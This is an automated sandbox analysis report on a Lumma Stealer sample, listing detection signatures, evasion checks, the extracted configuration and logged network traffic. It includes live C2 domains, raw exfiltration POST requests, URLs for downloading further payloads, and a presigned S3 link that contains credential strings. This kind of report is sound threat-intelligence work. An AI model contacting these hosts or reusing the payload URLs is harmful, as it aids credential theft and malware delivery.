
Windows Analysis Report
OtHVIQ2ge4.exe

Overview

General Information

Sample name: OtHVIQ2ge4.exe (renamed because the original name is a hash value)
Original sample name: 4ba0641b1f9224605df854c9baaa5dcf.exe
Analysis ID: 1579973
MD5: 4ba0641b1f9224605df854c9baaa5dcf
SHA1: 386655601ba905a637b7a8a37d031f087fd66f3c
SHA256: 7cadf23c992d86cba2587cdf6ddccc39a0d72deb6eef34eb64aae0c097e2f54a
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • OtHVIQ2ge4.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\OtHVIQ2ge4.exe" MD5: 4BA0641B1F9224605DF854C9BAAA5DCF)
    • WerFault.exe (PID: 5340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "tentabatte.lat", "talkynicer.lat", "observerfry.lat", "slipperyloo.lat", "bashfulacid.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: OtHVIQ2ge4.exe PID: 7832 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T17:20:56.264024+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49717 | 104.21.36.201 | 443 | TCP
2024-12-23T17:20:58.221530+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49723 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:01.343367+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49729 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:03.705955+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49735 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:06.471599+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49741 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:08.970444+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49747 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:11.861870+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49759 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:17.048269+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49770 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:19.529477+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 185.166.143.49 | 443 | TCP
2024-12-23T17:21:22.009924+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49783 | 52.217.75.84 | 443 | TCP
2024-12-23T17:20:56.994147+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49717 | 104.21.36.201 | 443 | TCP
2024-12-23T17:20:59.644133+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49723 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:17.805059+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49770 | 104.21.36.201 | 443 | TCP
2024-12-23T17:20:56.994147+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49717 | 104.21.36.201 | 443 | TCP
2024-12-23T17:20:59.644133+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49723 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:02.342460+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49729 | 104.21.36.201 | 443 | TCP
2024-12-23T17:21:11.866061+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.9 | 49759 | 104.21.36.201 | 443 | TCP


                AV Detection

Source: OtHVIQ2ge4.exe | Avira: detected
Source: OtHVIQ2ge4.exe.7832.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "tentabatte.lat", "talkynicer.lat", "observerfry.lat", "slipperyloo.lat", "bashfulacid.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: OtHVIQ2ge4.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: OtHVIQ2ge4.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
Source: OtHVIQ2ge4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.9:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.75.84:443 -> 192.168.2.9:49783 version: TLS 1.2
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49729 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49770 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49759 -> 104.21.36.201:443
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Joe Sandbox View | IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View | IP Address: 104.21.36.201 104.21.36.201
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49717 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49741 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49747 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 185.166.143.49:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49759 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49770 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49735 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49729 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49783 -> 52.217.75.84:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 53; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=E2DQ77VNG; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12797; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=IM0Z09FOG; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15015; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=ICQWIJFXDT77D23LZB4; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20591; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=90V9QFL94G; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1180; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=P5UKJIKOWJM3; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 584761; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 88; Host: observerfry.lat
Source: global traffic | HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: observerfry.lat
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe8
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exer
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: OtHVIQ2ge4.exe, 00000000.00000002.1927343304.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001741000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515380529.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1533192683.000000000170B000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTru
Source: OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669196004.0000000005DF7000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DF6000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
